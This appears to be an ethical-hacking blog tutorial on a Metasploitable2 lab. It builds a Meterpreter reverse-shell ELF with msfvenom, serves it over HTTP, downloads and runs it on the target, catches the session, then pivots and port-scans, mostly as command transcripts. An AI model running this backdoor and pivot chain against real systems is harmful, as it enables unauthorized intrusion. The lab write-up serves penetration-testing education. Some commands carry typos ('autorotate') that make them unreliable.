    This is own IP 192.168.43.152...




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf                 
    [sudo] password for hackerboy: 
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder specified, outputting raw payload
    Payload size: 123 bytes
    Final size of elf file: 207 bytes
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls                             
    backdoor.elf  ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    



    We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding screenshot. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and port number that backdoor.elf file will connect to in order to provide us meterpreter access to the target. The -f switch defines the ourput type, and elf is the default extension for the linux-based systems.

     

    But what happend next, shall we go to our victim's system and do post-exploitation? No, nothing like this is going to happen, we will maintain access to materpreter shell through exploit and if you say, with the help of apache server on our system, we will upload the shell to the victim's system.

     

    If your Victim is on another network means away from you, then we can buy and host a server for this and then upload it onto the target machine.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo service apache2 start                                                                              
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo mv backdoor.elf /var/www/html/                                                                                      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    We run the apache service via the service apache2 start command and move the backdoor file into the default document root directory of the Apache server. Let us now download the file from our Apache server onto the victim system.


    whoami
    root
    pwd
    /
    
    
    wget http://192.168.43.152/backdoor.elf       
    --16:06:29--  http://192.168.43.152/backdoor.elf
               => `backdoor.elf'
    Connecting to 192.168.43.152:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    
        0K                                                       100%    7.65 MB/s
    
    16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]
    
    
    


    We can download the file via the wget command, as shown in the preceding screenshot. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.



    OR (2nd method to upload a backdoor file in our victim machine)

     

    We can upload a backdoor in our victim's machine by python's http.server..like this


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
    └─$ python3 -m http.server 1234                                                                                                   1 ⨯
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 
     
     

     

    and after then, in out victim's machine , we get a backdoor file via wget  command :-



    whoami
    root
    pwd
    /
    
    wget http://127.0.0.1/backdoor.elf
    
    --2021-07-10 00:47:02--  http://127.0.0.1/backdoor.elf
    Connecting to 127.0.0.1:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    Saving to: ‘backdoor.elf’
    
    backdoor.elf                      100%[===========================================================>]     207  --.-KB/s    in 0s      
    
    2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]
    
    




    We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > use exploit/multi/handler
    [*] Using configured payload linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/handler) > set LHOST 192.168.43.152
    LHOST => 192.168.43.152
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler...
    
    
    
    

    When we download the file onto the target, we provide appropriate permissions to the file via the chmod command, as shown in the following screenshot:



    chmod 777 backdoor.elf
    
    
    
    
    ls -la
    total 129
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 .
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 ..
    -rwxrwxrwx   1 root root   207 Jul  9 16:17 backdoor.elf
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 15:53 dev
    drwxr-xr-x  94 root root  4096 Jul  9 16:19 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    ....
    
    
    ./backdoor.elf 
    
    


    Providing the 777 permission will grant all the relevant read, write, and execute permissions on the file. Execute the file, and now switch to the other terminal, which is running our exploit handler:



    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    [*] Sending stage (984904 bytes) to 192.168.43.120
    [*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530
    
    meterpreter > 
    
    



    Mumma, we got it, we got the meterpreter shell acces to the target. Lets find some interesting information using the post exploitation modules:




    meterpreter > sysinfo
    Computer     : metasploitable.localdomain
    OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
    Architecture : i686
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > 
    meterpreter > ifconfig
    
    



    Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.



    meterpreter > 
    meterpreter > ifconfig
    
    Interface  1
    ============
    Name         : lo
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 16436
    Flags        : UP,LOOPBACK
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
    
    
    Interface  2
    ============
    Name         : eth0
    Hardware MAC : 08:00:27:67:67:30
    MTU          : 1500
    Flags        : UP,BROADCAST,MULTICAST
    IPv4 Address : 192.168.43.120
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    IPv6 Address : fe80::a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    
    meterpreter > 
    



    Running the ifconfig command on the target, we see pretty interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems may reside. We run the arp command on the target and check if there are some systems already connected or were connected to the exploited system from the internal network, as shown in the following screenshot:



    meterpreter > arp
    
    ARP cache
    =========
    
        IP address      MAC address        Interface
        ----------      -----------        ---------
        192.168.43.152  fc:01:7c:29:00:77
    
    meterpreter > 
    
    
    
    

    We can clearly see an additional system with IP address 192.168.43.120 on the internal network. Approaching the internal network, we need to set up pivoting on the exploited machine using the autoroute command.



    meterpreter > run autoroute -p
    
    [*] No routes have been added yet 
    meterpreter > 
    
    
    
    meterpreter > run autorotate -s 192.168.43.120 255.255.255.0
    
    [*] Adding a route to 192.168.43.120/255.255.255.0...
    [+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120 
    [*] Use the -p option to list all active routes
    
    meterpreter > run autorotate -p
    
    Active Routing Table
    ====================
    
       Subnet            Netmask         Gateway
       ------            -------         -------
       192.168.43.120    255.255.255.0   Session 1 
    
    meterpreter > 
    
    
    


    The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.

    Let us now put the meterpreter session in the background by using the background command as follows:



    meterpreter > background 
    [*] Backgrounding session 1...
    msf6 exploit(multi/handler) > hosts
    
    Hosts
    =====
    
    address          mac                 name      os_name      os_flavor     os_sp     purpose     info
    comments 
    -------          ---                 ----      ------        -----       ----       -----      ----
     ------
    192.168.43.120   fc:01:7c:29:00:77   metasploitable  Linux                          Server
     
    
    
    msf6 exploit(multi/handler) > 
    




    Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:



    msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > show options
    
    Module options (auxiliary/scanner/portscan/tcp):
    
       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       CONCURRENCY  10               yes       The number of concurrent ports to check per host
       DELAY        0                yes       The delay between connections, per thread, in milliseconds
       JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
       PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       THREADS      1                yes       The number of concurrent threads (max one per host)
       TIMEOUT      1000             yes       The socket connect timeout in milliseconds
    
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
    RHOSTS => 192.168.43.0
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [*] 192.168.43.0:         - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:23 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:25 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:21 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:53 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:111 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:139 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:445 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:514 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:513 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:512 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1099 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1524 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2049 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2121 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3632 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5900 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6000 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6200 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6667 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6697 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8009 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8180 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8787 - TCP OPEN
    [*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    
    
    


    Running the port scan module will require us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg option will globally set RHOSTS value to 192.168.43.120 and thus eliminates the need to retype the set RHOSTS command again and again.

    In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:



    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
    msf6 auxiliary(scanner/http/http_version) > show options
    
    Module options (auxiliary/scanner/http/http_version):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    80               yes       The target port (TCP)
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       THREADS  1                yes       The number of concurrent threads (max one per host)
       VHOST                     no        HTTP server virtual host
    
    msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/http/http_version) > run
    
    [+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/http/http_version) > 
    
    
    


    Running the auxiliary module, we find that the service running on port 80 is the popular Apache 2.2.8 web server. Exploring the web, we find that the PHP version 5.2.4 is vulnerable and can allow an attacker to gain access over the target system.


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.